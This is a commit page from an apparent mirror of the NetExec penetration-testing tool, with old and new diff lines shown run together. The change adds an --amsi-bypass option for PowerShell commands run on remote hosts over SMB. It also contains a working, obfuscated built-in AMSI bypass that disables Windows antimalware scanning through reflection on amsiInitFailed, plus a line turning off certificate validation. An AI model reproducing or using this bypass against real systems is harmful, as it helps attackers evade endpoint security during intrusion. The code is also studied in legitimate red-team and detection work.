swisskyrepo
/
NetExec
mirror of https://github.com/swisskyrepo/NetExec.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add option --amsi-bypass allowing you to pass a custom amsi bypass when using option -X

main
mpgn 2021-02-28 09:48:50 -05:00
parent 761637f247
commit d2f0b66ae4
2 changed files with 14 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
cme/helpers/powershell.py
View File

@ -67,9 +67,15 @@ def obfs_ps_script(path_to_script):
return strippedCode return strippedCode
def create_ps_command(ps_command, force_ps32=False, dont_obfs=False): def create_ps_command(ps_command, force_ps32=False, dont_obfs=False, custom_amsi=None):
if custom_amsi:
amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} with open(custom_amsi) as file_in:
lines = []
for line in file_in:
lines.append(line)
amsi_bypass = ''.join(lines)
else:
amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{ try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true) [Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{} }catch{}

8
cme/protocols/smb.py
View File

@ -180,6 +180,7 @@ class smb(connection):
psgroup = smb_parser.add_argument_group('Powershell Obfuscation', "Options for PowerShell script obfuscation") psgroup = smb_parser.add_argument_group('Powershell Obfuscation', "Options for PowerShell script obfuscation")
psgroup.add_argument('--obfs', action='store_true', help='Obfuscate PowerShell scripts') psgroup.add_argument('--obfs', action='store_true', help='Obfuscate PowerShell scripts')
psgroup.add_argument('--amsi-bypass', nargs=1, metavar="FILE", help='File with a custom AMSI bypass')
psgroup.add_argument('--clear-obfscripts', action='store_true', help='Clear all cached obfuscated PowerShell scripts') psgroup.add_argument('--clear-obfscripts', action='store_true', help='Clear all cached obfuscated PowerShell scripts')
return parser return parser
@ -515,13 +516,14 @@ class smb(connection):
if not payload and self.args.ps_execute: if not payload and self.args.ps_execute:
payload = self.args.ps_execute payload = self.args.ps_execute
if not self.args.no_output: get_output = True if not self.args.no_output: get_output = True
amsi_bypass = self.args.amsi_bypass[0] if self.args.amsi_bypass else None
if os.path.isfile(payload): if os.path.isfile(payload):
with open(payload) as commands: with open(payload) as commands:
for c in commands: for c in commands:
self.execute(create_ps_command(c, force_ps32=force_ps32, dont_obfs=dont_obfs), get_output, methods) self.execute(create_ps_command(c, force_ps32=force_ps32, dont_obfs=dont_obfs, custom_amsi=amsi_bypass), get_output, methods)
else: else:
self.execute(create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs), get_output, methods) self.execute(create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs, custom_amsi=amsi_bypass), get_output, methods)
return '' return ''
def shares(self): def shares(self):